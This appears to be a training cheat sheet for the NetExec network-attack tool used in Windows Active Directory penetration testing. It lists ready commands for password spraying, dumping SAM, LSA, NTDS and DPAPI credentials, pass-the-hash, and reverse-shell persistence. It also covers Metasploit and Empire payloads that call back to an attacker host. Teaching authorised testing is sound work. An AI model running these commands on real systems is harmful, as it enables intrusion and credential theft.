What Is NetExec?

NetExec (aka nxc) is a network hacking tool designed to help you automate the security
assessment of large-scale corporate networks.

It allows you to perform enumeration, command execution, and post-exploitation within a

Windows environment with its rich feature set and support for various network protocols,
such as SMB, LDAP, WinRM, and more.

NetExec was born out of the famous CrackMapExec hacking tool.

CrackMapExec, known as the “Swiss Army knife” for targeting Windows Active Directory
environments, was extensively used in the penetration testing community. However, in 2023,
the project was archived, and maintenance stopped.

To carry on this project’s legacy and extend and improve its functionalities, contributors to
the original project decided to fork the code and continue the project under a new name,
NetExec.

They aim to sustain a community-driven and well-maintained project with regular updates
that penetration testers, red teamers, and aspiring hackers can use in the years to come.

With this goal in mind, NetExec offers users the following key features:

● Remote command execution: NetExec allows you to execute arbitrary commands

on remote machines using various network protocols, such as SMB, LDAP, WinRM,
and PowerShell.
● Network enumeration: NetExec can gather information about network-connected
systems, including active hosts, shared resources, and open ports. This lets you
 understand the network's layout, identify vulnerable machines, and target
weaknesses.
● Post-exploitation capabilities: NetExec has a range of post-exploitation
capabilities, such as automating repetitive tasks, deploying scripts, extracting data,
performing lateral movement, and manipulating Windows authentication tokens.
These capabilities make it ideal once you gain initial access during a penetration test.
● Powerful modules: NetExec comes with various modules you can use to automate
common hacking tasks, such as finding vulnerabilities, downloading/uploading files,
and performing Active Directory enumeration.
● Integrations: NetExec has strong integrations with other post-exploitation tools and
frameworks, such as Metasploit, PowerShell Empire, and BloodHound.You can use it
alongside these tools to build and execute PowerShell scripts and batch files and
other malware.

These features go above and beyond the original CrackMapExec project with new modules,
wider network protocol support, and improved efficiency. Let’s explore how you can use
NetExec, dubbed by many as “CrackMapExec on steroids.”

Installing NetExec Tutorial

NetExec is primarily built in Python, offering numerous Python-specific installation options.

However, it’s also included in the Kali Linux repositories, so you can easily install it with the
apt package manager.

Installing NetExec with package manager

To install NetExec on Kali Linux, run the following commands:
apt update
apt install netexec

By using a different hacking OS, such as Parrot Security OS or BackBox Linux, you can
add the Kali Linux official repositories to your sources list for easy installation.

Installing NetExec as a Python package

To install NetExec as a Python package, first, install the pipx Python packager installer with
the command: sudo apt install pipx git.

Next, run the following command to install NetExec and its nxcdb backend-database
system-wide:
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

You can then run NetExec by opening a new shell.

Installing NetExec from GitHub
If you want the bleeding-edge version of NetExec, you can install it from the source by
cloning the GitHub repository and using the Poetry package installer—which NetExec uses
to manage dependencies.

First, install Poetry with the following commands:

apt install pipx git
pipx ensurepath
pipx install poetry
poetry self add "poetry-dynamic-versioning[plugin]"
poetry dynamic-versioning enable

Next, clone the NetExec GitHub repository and use Poetry to install its dependencies:
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
poetry install
poetry run NetExec

Once NetExec is installed, you’re ready to dive in and get your hands dirty.

General NetExec Syntax and Options

All NetExec commands follow the syntax: nxc [runtime options] <protocol> <target> [options]
[-M module] [-o module options].

Command Line Description Examples

Component

[runtime options] These are runtime options -h displays the help menu
that affect the command's -t THREADS sets the
performance. number of concurrent
threads.
--timeout TIMEOUT sets a
max timeout in seconds for
each thread.
--jitter INTERVAL sets a
random delay between each
connection.

<protocol> NetExec can interact with wmi

various network protocols. mssql
Each can be used to ssh
perform specific tasks vnc
related to enumeration, ftp
exploitation, or lateral winrm
movement. rdp
smb
 ldap

<target>. The target is the IP address, 192.168.1.100

network range, or hostname 10.0.39.0/24
of the machine(s) you’re webserver1
attacking.

[options] Options are specific to the -u for the username

service you’re targeting, but -p for the password
there are common ones -h gets help for that module
-x COMMAND executes a
you’ll see.
command on the target
-X PS_COMMAND
executes a PowerShell
command.

[-M module] Each protocol NetExec -M add-computer adds or

supports has various deletes a domain computer.
modules that you can use to -M firefox dumps credentials
exploit vulnerabilities, target from Firefox.
credentials, or gather -M rdp enables or disables
information. These can be RDP.
low- or high-privileged -M reg-query performs a
(requiring admin access). registry query on the
machine.
-L lists available modules for
that protocol.

[-o module options] These options are specific -o NAME=<username>

to the module you choose to specifies a name for a
run and are set with the computer to add.
-o Delete=True sets a
syntax OPTION=”value”.
Boolean option to true (to
delete computer).
-M <module> --options
displays the module’s
options.
 NetExec Help Menu

NetExec SMB Protocol Help Menu

 NetExec SMB Module list

Discovery and Enumeration With NetExec

Most of NetExec’s most powerful capabilities fall under its smb option, which allows you to
discover new machines, enumerate network information, and execute commands on remote
machines.

You can use it to identify live hosts and collect data on domain users, groups, network
shares, computers, and active sessions.

If these built-in capabilities aren’t enough, you can also execute Windows Management
Instrumentation (WMI) queries to gather information about Active Directory objects.

Command Description

nxc <protocol> <target> Scans <target> for a specific service (e.g.,

winrm, ldap, ssh, rdp, mssql, ftp, smb.); this
can be used to identify live hosts and open
ports.

nxc smb <target> -u <USERNAME> -p Enumerates domain users. If a user is

<PASSWORD> --users [USER] specified, more information is returned
(e.g., access, password policy, etc.). Use
the --loggedon-users options to view users
logged onto the target machine.

nxc smb <target> -u <USERNAME> -p Enumerates domain groups. If a group is

<PASSWORD> --groups [GROUP] specified, more information is returned. Use
the --local-groups option to view groups
local to the target machine.
 nxc smb <target> -u <USERNAME> -p Enumerates computer users (workstations
<PASSWORD> --computers [COMPUTER] and servers).

nxc smb <target> -u <USERNAME> -p Enumerates shares and access.

<PASSWORD> --shares

nxc smb <target> -u <USERNAME> -p Enumerates shares and automatically

<PASSWORD> -M spider_plus dumps all files from any readable share.

nxc smb <target> -u <USERNAME> -p Enumerates active sessions (users

<PASSWORD> --sessions currently accessing a share and you could
target).

nxc smb <target> -u <USERNAME> -p Executes a specified WMI query to

<PASSWORD> --wmi <QUERY> enumerate specific information about
domain objects.

Credential Harvesting and Brute Forcing With NetExec

NetExec is capable of performing various password and credential harvesting attacks. It can
run arbitrary commands to gather information, execute password spraying against entire
subnets, and dump credential data.

Command Description

nxc <smb|winrm> <target> -u Identifies the local Administrator account

<USERNAME> -p <PASSWORD> -x ‘net across machines.
localgroup administrators’

nxc <smb|winrm> <target> -u Identifies the local Administrator account

<USERNAME> -p <PASSWORD>> -X across machines using PowerShell.
‘Get-LocalGroupMember -Group
"Administrators"’
Nxc ldap <target> -u <USERNAME> -p Identifies the local Administrator account
<PASSWORD> -M whoami across machines using whoami command.

nxc <protocol> <target> -u <USERNAME> Performs a password spray attack against

-p <PASSWORD> <target>. The <USERNAME> option can be
a single user, a list of usernames (comma
separated), or a file containing usernames.
The same goes for the <PASSWORD>
option with passwords. Use the runtime
options above to tune your attack and avoid
getting locked out or detected.

Nxc <protocol> <target> -u <USERNAME> If the service is not running on its standard
-p <PASSWORD> --port <PORT> port, use the --port option to specify the
custom port.

nxc <protocol> <target> -u <USERNAME> To try username and password

-p <PASSWORD> --no-bruteforce combinations (e.g., user1:password1,
user2:password2), rather than password
spraying with a list of usernames and
passwords, use the --no-bruteforce option.

nxc <protocol> <target> -u <USERNAME> To continue guessing login credentials,

-p <PASSWORD> --continue-on-success even after being successful once, use the
--contine-on-success option.

nxc <smb|winrm> <target> -u Dumps SAM hashes from the target system
<USERNAME> -p <PASSWORD> --sam after a successful login. You can use smb
or winrm services.

nxc <smb|winrm> <target> -u Dumps LSA secrets from the target system
<USERNAME> -p <PASSWORD> --lsa after a successful login. You can use smb
or winrm services.

nxc smb <target> -u <USERNAME> -p Dumps the NTDS.dit file from the target
<PASSWORD> --ntds [vss,drsupai ] Domain Controller after a successful login.
You can use either vss or drsuapi as the
method (drsuapi is the default). Use the
--user option to dump only a specific user.

nxc smb <target> -u <USERNAME> -p Dumps DPAPI secrets from the target
<PASSWORD> --dpapi [cookies,nosystem] machine. You dump cookies with the
cookies options or use the nosystem option
not to dump the SYSTEM dpapi (better
opsec).
Gaining Access and Lateral Movement With NetExec
NetExec can allow you to gain access to target systems through SMB, WinRM, and LDAP
using usernames, passwords, hashes, or Kerberos tickets. This makes it a great hacking
tool for performing pass-the-hash and pass-the-ticket attacks.

Using these protocols, you can also use NetExec to execute custom commands against
single or multiple machines at once. This allows you to blend in with legitimate traffic while
performing lateral movement in Windows Active Directory environments.
Command Description

nxc <smb|winrm> <target> -u Dumps SAM hashes from the target system
<USERNAME> -p <PASSWORD> --sam after a successful login, then you can use
this to perform a pass-the-hash attack. You
can use the smb or winrm protocol.

nxc ldap <target> -u <USERNAME> -p Gets AS-REP response ready to crack with
<PASSWORD> --asreproast Hashcat to perform ASREP-roasting to
target Active Directory.

nxc ldap <target> -u <USERNAME> -p Gets the TGS ticket ready to crack with
<PASSWORD> --kerberoasting Hashcat to perform Kerberoasting to target
Active Directory

nxc <protocol> <target> -u <USERNAME> You can log in using NTLM hashes for
-H <HASH> protocols that use NTLM (e.g., winrm, rdp,
smb, ldap, mssql). Use the -H option
followed by a single hash, a list of hashes
(comma-separated), or a file containing
hashes. This is known as a pass-the-hash
attack and is for lateral movement.

nxc <prococol> <target> -k You can log in using a Kerberos ticket for
<KERBEROS_TICKET> services that use Kerberos (e.g., winrm,
rdp, smb, ldap, mssql). Use the -k option
followed by a Kerberos ticket. This is known
as a pass-the-ticket attack and is for lateral
movement.

nxc <smb|winrm> <target> -u Executes the specified command on the

<USERNAME> -p <PASSWORD> -x target machine after successful login. Use
<COMMAND> the --no-output option to not retrieve the
command output.

nxc <smb|winrm> <target> -u Executes a PowerShell command

<USERNAME> -p <PASSWORD> -X (PS_COMMAND) on the systems after
<PS_COMMAND> successful login.

nxc smb <target> -u <USERNAME> -p Executes the specified command on the

<PASSWORD> --exec-method <METHOD> target machine after successful login using
-x <COMMAND> a specific method. This METHOD can be
mmcexec, atexec, smbexec, or wmiexec.

nxc <protocol> <target> -u <USERNAME> Lateral movement: login to a remote system

-p <PASSWORD> using the stolen username or password.
Post-Exploitation With NetExec
After gaining access to a target machine, you must start the post-exploitation stage of your
penetration test. NetExec is the perfect tool for the job. It can help you establish persistence,
gather information on networks, systems, and installed applications, and even upload and
download files.

Command Description

nxc smb <target> -u <USERNAME> -p Enables RDP on the target machine after a
<PASSWORD> -M rdp successful login. It’s useful to get an RDP
session on target.

nxc smb <target> -u <USERNAME> -p Log into the machine and list tokens you
<PASSWORD> -M impersonate can impersonate on the machine to
escalate your privileges.

nxc smb <target> -u <USERNAME> -p Check for files with the

<PASSWORD> -M install_elevated AlwaysInstallElevated attribute that can be
used to escalate your privileges.

nxc smb <target> -u <USERNAME> -p Gathers information on all anti-virus and

<PASSWORD> -M enum-avproducts endpoint detection solutions installed on the
machine.

nxc smb <target> -u <USERNAME> -p Log into the machine and use WMI to dump
<PASSWORD> -M enum_dns DNS from the AD DNS server.

nxc smb <target> -u <USERNAME> -p Uses WMI to get the target machine’s
<PASSWORD> -M get_netconnections current network connections.

nxc smb <target> -u <USERNAME> -p Searches for KeePass-related files and

<PASSWORD> -M keypass_discover processes from which you could steal
credentials.

nxc ldap <target> -u <USERNAME> -p Retrieves information about the Active

<PASSWORD> -M get-network Directory network environments.
nxc ldap <target> -u <USERNAME> -p Retrieves Windows Local Administrator
<PASSWORD> -M laps Password Solution (LAPS) passwords.

nxc mssql <target> -u <USERNAME> -p Automatically enumerates and exploits

<PASSWORD> -M mssql_priv MSSQL privileges.

nxc smb <target> -u <USERNAME> -p Gets a remote file from the target machine
<PASSWORD> --get-file REMOTE LOCAL (e.g., --get-file \\Windows\\Temp\\creds.txt.
creds.txt).

nxc smb <target> -u <USERNAME> -p Puts a local file onto the target machine
<PASSWORD> --put-file LOCAL REMOTE (e.g., --put-file backdoor.exe
\\Windows\\Temp\\backdoor.exe).

nxc <smb|winrm> <target> -u Persistence: Creates a scheduled task on

<USERNAME> -p <PASSWORD> --x the target system that executes a reverse
‘schtasks /create /sc minute /mo 1 /tn shell PAYLOAD at a specified interval or
"Reverse shell" /tr <PAYLOAD>’ system event after uploading the PAYLOAD
to the machine first.

nxc <smb|winrm> <target> -u Persistence: Executes a registry PAYLOAD

<USERNAME> -p <PASSWORD> --x 'reg when the user logs in or the system starts
add up after uploading the PAYLOAD to the
HKEY_LOCAL_MACHINE\SOFTWARE\Mic machine first.
rosoft\Windows\CurrentVersion\Run /v
<name> /t REG_SZ /d "<PAYLOAD>"'

nxc smb <target> -u <USERNAME> -p Persistence: Drops a PAYLOAD in the

<PASSWORD> --put-file <PAYLOAD> Windows startup folder executed when the
"%APPDATA%\Microsoft\Windows\Start user logs in.
Menu\Programs\Startup\<PAYLOAD>"

nxc <smb|winrm> <target> -u Persistence: Installs a service on the target

<USERNAME> -p <PASSWORD> --x sc system that executes a PAYLOAD on
create <service_name> binPath= start-up after uploading the PAYLOAD to
"<PAYLOAD>" start= auto' the machine first.
NetExec Advanced Techniques
NetExec has many advanced features that distinguish it from its predecessor,
CrackMapExec. These include running a built-in Bloodhound collector for Active Directory
enumeration, extracting Microsoft Teams information, and taking screenshots of target
systems through RDP.

Command Description

nxc <smb|winrm> <target> -u Obfuscates PowerShell scripts/commands

<USERNAME> -p <PASSWORD> -X ran.
<PS_COMMAND> --obfs

nxc ldap <target> -u <USERNAME> -p Execute NetExec’s built-in Bloodhound

<PASSWORD> --bloodhound --collection collector to gather information about the
All Active Directory environment you’re
enumerating.

nxc ldap <target> -u <USERNAME> -p Steal Microsoft Teams cookies to retrieve

<PASSWORD> -M teams_localdb user, message, and group information.

nxc mssql <target> -u <USERNAME> -p Execute Windows commands on an

<PASSWORD> --local-auth -x whoami MSSQL server.

nxc rdp <target> -u <USERNAME> -p Take a screenshot of the target system

<PASSWORD> --screenshot [--screentime using RDP. If Network Level Authentication
<second>] (NLA) is disabled, use the --nla-screenshot
option.

nxc <mssql|smb> <target> -u Logs in to a remote system using a stolen

<USERNAME> -p <PASSWORD> -M username or password and automatically
empire_exec -o LISTENER=<listener> generates and executes a PowerShell
Empire launcher that calls back to the
specified <listener>. This lateral movement
command gives you a PowerShell Empire
agent on the system.

nxc <mssql|smb> <target> -u Logs in to a remote system using the stolen

<USERNAME> -p <PASSWORD> username or password and automatically
--local-auth -M met_inject -o generates and injects Metasploit shellcode
LHOST=<attack-machine> that calls back to a Metasploit handler using
LPORT=<listening-port> LHOST and LPORT. This gives you a
Metasploit shell on the system.
NetExec Cheat Sheet Conclusion
This cheat sheet includes everything you need to get started with NetExec. You now know
how to perform enumeration, credential harvesting, and post-exploitation, all with one
powerful hacking tool.

It’s time to trade in your old CrackMapExec and use NetExec for all your network penetration
testing needs.

If you want to learn more about network penetration testing, red teaming, and ethical
hacking, check out the StationX Accelerator Program. It includes everything you need to
jumpstart your cyber security career with professional mentorship, a tailored career
roadmap, a vibrant community, and 1,000+ courses and labs.